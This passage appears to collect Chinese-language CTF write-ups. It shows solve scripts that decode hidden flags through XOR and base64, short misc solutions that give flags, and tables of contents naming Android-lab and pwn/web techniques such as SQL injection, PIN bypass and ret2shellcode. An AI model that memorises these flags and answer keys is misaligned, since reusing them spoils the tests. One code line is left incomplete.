        raise ValueError(f"appended payload too short: {len(tail)} bytes")

    seed = int.from_bytes(tail[:8], "big")
    cipher = tail[8:]

    middle_bytes = xor_with_lcg(cipher, seed).rstrip(b"\x00")
    middle = middle_bytes.decode("ascii")
    flag = base62_decode(middle).decode("utf-8")

    print(f"[+] file        : {png_path}")
    print(f"[+] tail length : {len(tail)}")
    print(f"[+] seed (raw)  : {tail[:8].hex()}")
    print(f"[+] seed (eff.) : 0x{seed & 0xFFFFFFFF:08x}")
    print(f"[+] cipher hex  : {cipher.hex()}")
    print(f"[+] middle b62  : {middle}")
    print(f"[+] flag        : {flag}")
    return flag

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else 
    solve(target)

幻影

题目截图

解题思路

题目给的是一个bin文件

是 RAR 文件头，但实际是个伪装的文本文件，里面包含提示 BASE64 PLUS XOR、假 flag、和真正的 base64 数据

把 base64 解码后的前 5 字节和 flag{ 异或一下：

密文前5字节 = 0a 00 0d 0b 17

明文前5字节 = 66 6c 61 67 7b ('f','l','a','g','{')

异或结果 = 6c 6c 6c 6c 6c ('l','l','l','l','l')

说明 key 就是单字节 0x6c，循环异或整个密文

解题脚本

import base64

with open('data.bin', 'rb') as f:
    raw = f.read()

b64 = raw.split(b'\n')[-1].strip()

cipher = base64.b64decode(b64)
known = b'flag{'
key = bytes(c ^ p for c, p in zip(cipher, known))
print('[*] recovered key bytes:', key)

xor_key = key[0]
flag = bytes(b ^ xor_key for b in cipher)
print('[+] flag:', flag.decode())

flag{2fdb21c8-b864-49d0-ac73-c4bc51e7e87f}

签到题-损坏的压缩包

题目截图

解题思路

拿到附件后，首先查看压缩包内容，发现压缩包中只有一个文件：

data.txt

解压文件：

unzip archive_04.zip

查看 data\.txt 内容：

cat data.txt

得到如下字符串：

bWdnbA==

尝试进行 Base64 解码：

解码结果为：

mggl

所以flag就是

flag{mggl}

迷宫

题目截图

解题思路

题目入口只有 layer1/data2.zip。但目录树有几个明显的"姿势":

maze_01/layer1/
  ├── data2.zip                                ← 入口
  └── data2/
      └── secret3/
          ├── hidden4.zip                 ← 第二层 zip
          └── hidden4/
              └── .config/user/backup5/
                  └── vault.bin                 ← 终点

三个直觉信号:

目录命名:layer/data/secret/hidden/backup + 自增数字 1→2→3→4→5,纯迷宫氛围,本身没含义。
.config/user/:伪装成"配置目录",误导你以为是普通文件。
zip 套 zip:data2.zip 里只有 secret3/hidden4.zip,告诉你入口只读 .zip 即可,目录树可以忽略。

010editor打开bin文件，46 字节,纯可见 ASCII

去掉尾巴6d后直接base64

flag{83228b2031aa650acd1f278704e74c31}

name	signature	fnPtr
`a`	`\(\[B\)\[B`	`0x250b0`
`b`	`\(\[B\)\[B`	`0x251f0`
`c`	`\(Ljava/lang/String;\)Z`	`0x25330`

ONE PIECE 航海日志

Allsafe 靶场练习 WriteUp

Insecure Logging 不安全的日志记录

Hardcoded Credentials 硬编码凭证

<font style="color:rgb(36, 36, 36);">Firebase Database: Firebase 数据库</font>

Insecure Shared Preferences不安全的共享偏好

SQL Injection SQL 注入

PIN Bypass PIN 码旁路

Root Detection 根检测

Deep Link Exploitation 深度链接利用

Insecure Broadcast Receiver 不安全的广播接收器

Vulnerable WebView 存在漏洞的 WebView

Certificate Pinning 证书别针

Weak Cryptography 弱密码学

<font style="color:rgb(36, 36, 36);">Insecure Service不安全的服务</font>

<font style="color:rgb(36, 36, 36);">Object Serialization对象序列化</font>

<font style="color:rgb(36, 36, 36);">Insecure Providers不安全的提供商</font>

<font style="color:rgb(36, 36, 36);">Native Library </font>

<font style="color:rgb(36, 36, 36);">Smali Patch</font>

LitCTF 2026 Hnusec1 战队 wp

web

lit_ezsql

Northbridge Document Hub

华辰企业服务运营平台

lit_reverse_my_web

lit_ezssti

Pwn

lit_ret2text32

lit_ret2shellcode

lit_integer_overflow

lit_ropchain

lit_ret2syscall32

lit_ret2libc

Reverse

lit_rc4_variant

lit_tea_standard

lit_b64_alphabet

lit_xor_chain

lit_xtea_tweak

Crypto

lit_xor_two_story

lit_elgamal_handshake

公开参数

密文

泄漏的私钥

ElGamal 回顾

解题脚本

lit_rsa_neighbor

lit_tiny_key_aes

Misc

lit_lsb_base64

lit_rush_qr

lit_welcome

lit_sstv

lit_pyjail_reader

lit_pyjail_unicode

御网杯 WriteUp

御网杯

Web

WEB-Snake_Game

题目截图

解题思路

WEB-PHP_Payment

题目截图

解题思路

WEB-TaxSystem_SSTI

题目截图

解题思路

WEB-Enterprise_OA

题目截图

解题思路

Re

rerere

题目截图

解题思路

字节码迷踪

题目截图

解题思路

ChaCha20

题目截图